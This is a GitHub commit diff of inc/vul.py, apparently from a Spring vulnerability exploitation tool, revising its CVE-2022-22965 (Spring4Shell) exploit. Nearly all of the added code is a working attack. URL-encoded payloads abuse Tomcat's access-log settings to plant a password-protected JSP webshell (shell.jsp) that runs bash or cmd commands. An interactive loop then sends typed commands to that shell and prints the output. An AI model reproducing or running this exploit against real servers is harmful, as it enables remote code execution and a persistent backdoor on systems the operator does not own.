Skip to content

Commit 29f4e20

Browse files
AabyssZGAabyssZG
authored
Update vul.py
1 parent ef391b3 commit 29f4e20

File tree

1 file changed

+24
-14
lines changed

1 file changed

+24
-14
lines changed

inc/vul.py

Lines changed: 24 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -22,40 +22,50 @@ def CVE_2022_22965(url, proxies):
2222
cprint("======开始对目标URL进行CVE-2022-22965漏洞利用======", "green")
2323
Headers_1 = {
2424
"User-Agent": random.choice(ua),
25+
"prefix": "<%",
2526
"suffix": "%>//",
27+
"c": "Runtime",
2628
"c1": "Runtime",
2729
"c2": "<%",
2830
"DNT": "1",
31+
}
32+
Headers_2 = {
33+
"User-Agent": random.choice(ua),
2934
"Content-Type": "application/x-www-form-urlencoded"
30-
}
31-
payload_linux = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
32-
payload_win = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
33-
payload_http = """?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
34-
data1 = payload_linux
35-
data2 = payload_win
35+
}
36+
payload_linux = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
37+
payload_win = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
38+
payload_http = """?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
39+
payload_other = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
40+
file_date_data = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_"
3641
getpayload = url + payload_http
3742
try:
3843
requests.packages.urllib3.disable_warnings()
39-
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
44+
requests.post(url, headers=Headers_2, data=file_date_data, verify=False)
45+
requests.post(url, headers=Headers_2, data=payload_other, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
46+
requests.post(url, headers=Headers_1, data=payload_linux, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
4047
sleep(0.5)
41-
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
48+
requests.post(url, headers=Headers_1, data=payload_win, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
4249
sleep(0.5)
4350
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
4451
sleep(0.5)
45-
test = requests.get(url + "tomcatwar.jsp", verify=False, proxies=proxies)
46-
if (test.status_code == 200) and ('aabysszg' in str(test.text)):
47-
cprint("[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "tomcatwar.jsp?pwd=aabysszg&cmd=whoami" ,"red")
52+
requests.get(url, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
53+
test = requests.get(url + "shell.jsp", verify=False, proxies=proxies)
54+
test_again = requests.get(url + "shell.jsp", verify=False, proxies=proxies)
55+
if (test.status_code == 500) or (test_again.status_code == 200):
56+
cprint("[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "shell.jsp?pwd=aabysszg&cmd=whoami" ,"red")
4857
while 1:
4958
Cmd = input("[+] 请输入要执行的命令>>> ")
5059
if Cmd == "exit":
5160
sys.exit(0)
52-
url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}".format(Cmd)
61+
url_shell = url + "shell.jsp?pwd=aabysszg&cmd={}".format(Cmd)
5362
r = requests.get(url_shell, verify=False, proxies=proxies)
54-
resp = r.text
63+
r_again = requests.get(url_shell, verify=False, proxies=proxies)
64+
resp = r_again.text
5565
result = re.findall('([^\x00]+)\n', resp)[0]
5666
cprint(result ,"green")
5767
else:
58-
cprint("[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址请手动尝试访问:\n[/tomcatwar.jsp?pwd=aabysszg&cmd=命令] \n","yellow")
68+
cprint("[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址请手动尝试访问:\n[/shell.jsp?pwd=aabysszg&cmd=命令] \n","yellow")
5969
except KeyboardInterrupt:
6070
print("Ctrl + C 手动终止了进程")
6171
sys.exit()

0 commit comments

Comments
 (0)